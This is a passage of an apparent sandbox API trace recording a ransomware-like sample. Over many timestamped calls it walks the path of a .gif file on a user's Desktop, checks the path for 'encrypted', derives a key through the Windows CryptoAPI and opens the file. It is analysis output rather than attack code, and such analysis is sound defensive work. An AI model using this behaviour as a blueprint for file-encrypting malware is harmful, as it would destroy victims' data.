hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.899] CloseHandle (hObject=0x128) returned 1 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.899] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.900] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.900] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.900] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.900] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.900] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.900] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.900] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.900] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.900] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8cedd0, ftCreationTime.dwHighDateTime=0x1d5bdcc, ftLastAccessTime.dwLowDateTime=0x479a5890, ftLastAccessTime.dwHighDateTime=0x1d5b689, ftLastWriteTime.dwLowDateTime=0x479a5890, ftLastWriteTime.dwHighDateTime=0x1d5b689, nFileSizeHigh=0x0, nFileSizeLow=0x173c2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="v6hoz9YcOP.gif", cAlternateFileName="V6HOZ9~1.GIF")) returned 0x7c20c0 [0031.901] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8cedd0, ftCreationTime.dwHighDateTime=0x1d5bdcc, ftLastAccessTime.dwLowDateTime=0x479a5890, ftLastAccessTime.dwHighDateTime=0x1d5b689, ftLastWriteTime.dwLowDateTime=0x479a5890, ftLastWriteTime.dwHighDateTime=0x1d5b689, nFileSizeHigh=0x0, nFileSizeLow=0x173c2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="v6hoz9YcOP.gif", cAlternateFileName="V6HOZ9~1.GIF")) returned 0x7c20c0 [0031.901] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hoz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oz9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YcOP.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.903] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.903] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.903] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8cedd0, ftCreationTime.dwHighDateTime=0x1d5bdcc, ftLastAccessTime.dwLowDateTime=0x479a5890, ftLastAccessTime.dwHighDateTime=0x1d5b689, ftLastWriteTime.dwLowDateTime=0x479a5890, ftLastWriteTime.dwHighDateTime=0x1d5b689, nFileSizeHigh=0x0, nFileSizeLow=0x173c2, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="v6hoz9YcOP.gif", cAlternateFileName="V6HOZ9~1.GIF")) returned 0x7c2240 [0031.903] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.903] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.903] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.911] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0031.911] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.912] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.912] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.912] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.912] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.912] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.912] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.912] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.912] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.912] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.912] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0031.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.912] CryptDestroyHash (hHash=0x7c2100) returned 1 [0031.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\v6hoz9ycop.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.913] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.913] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0031.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 